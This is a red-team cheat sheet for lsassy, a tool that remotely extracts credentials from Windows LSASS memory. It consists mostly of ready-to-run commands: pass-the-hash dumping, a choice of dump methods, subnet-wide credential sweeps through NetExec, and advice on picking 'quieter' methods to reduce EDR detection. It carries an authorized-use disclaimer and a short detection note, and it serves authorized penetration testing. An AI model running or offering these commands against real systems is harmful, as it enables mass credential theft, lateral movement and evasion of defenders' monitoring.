LSASSY
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
lsassy remotely extracts credentials from LSASS memory across hosts using admin credentials, without dropping the raw dump to the attacker. It supports multiple dump methods and integrates with NetExec for at-scale harvesting. Post-compromise, authorized engagements only.
BASIC USAGE#
lsassy -u admin -p 'Pass' <host> # Dump one host lsassy -d corp.lu -u admin -p 'Pass' <host> # With domain lsassy -u admin -H <ntlm-hash> <host> # Pass-the-hash lsassy -u admin -p 'Pass' host1 host2 host3 # Multiple hosts lsassy -u admin -p 'Pass' -t targets.txt # Targets from file
DUMP METHODS#
lsassy -u a -p p -m comsvcs <host> # comsvcs.dll MiniDump lsassy -u a -p p -m dumpert <host> # Dumpert (syscalls) lsassy -u a -p p -m procdump <host> # Sysinternals procdump lsassy -u a -p p -m nanodump <host> # nanodump lsassy -u a -p p -m rdrleakdiag <host> # rdrleakdiag lsassy -m list # List available methods # Method choice affects EDR visibility - test in lab first
OUTPUT & PARSING#
lsassy -u a -p p <host> -j # JSON output lsassy -u a -p p <host> -o creds.txt # Save output lsassy -u a -p p <host> --format grep # Greppable lsassy -u a -p p <host> -k # Keep dump file # Parses NTLM hashes, cleartext (wdigest/tspkg), Kerberos tickets
NETEXEC INTEGRATION (AT SCALE)#
nxc smb <subnet> -u admin -p 'Pass' -M lsassy nxc smb <subnet> -u admin -H <hash> -M lsassy nxc smb targets.txt -u admin -p 'Pass' --local-auth -M lsassy # Sweeps every host where the account is admin and harvests creds
OFFLINE DUMP PARSING#
lsassy -u a -p p --dumppath C:\Windows\Temp\l.dmp <host> # Point lsassy at an existing remote dump instead of creating one # (pairs with pypykatz for local offline parsing - see PYPYKATZ.txt)
EXAMPLES#
# Single-host harvest via pass-the-hash, JSON out lsassy -d corp.lu -u admin -H :<nthash> -j 10.0.0.5 # Estate-wide credential sweep through NetExec nxc smb 10.0.0.0/24 -u admin -p 'Pass' -M lsassy # Choose a quieter dump method for a monitored environment lsassy -d corp.lu -u admin -p 'Pass' -m dumpert 10.0.0.5
NOTES#
- lsassy needs LOCAL ADMIN on the target; it is a post-compromise credential-harvesting step, not initial access - The comsvcs method is the loudest (well-signatured); dumpert/ nanodump reduce but do not eliminate EDR detection - lsassy avoids writing the raw LSASS dump to the attacker box by parsing remotely - still generates host-side telemetry - Detection: LSASS handle opens by non-standard processes, minidump behaviour (see EDR-EVASION.txt, DEFENDER-KQL.txt) - You have MIMIKATZ (on-host); lsassy is the remote/at-scale companion and pairs with PYPYKATZ for offline parsing - Credential harvesting must be explicitly in scope + rules of engagement for FS clients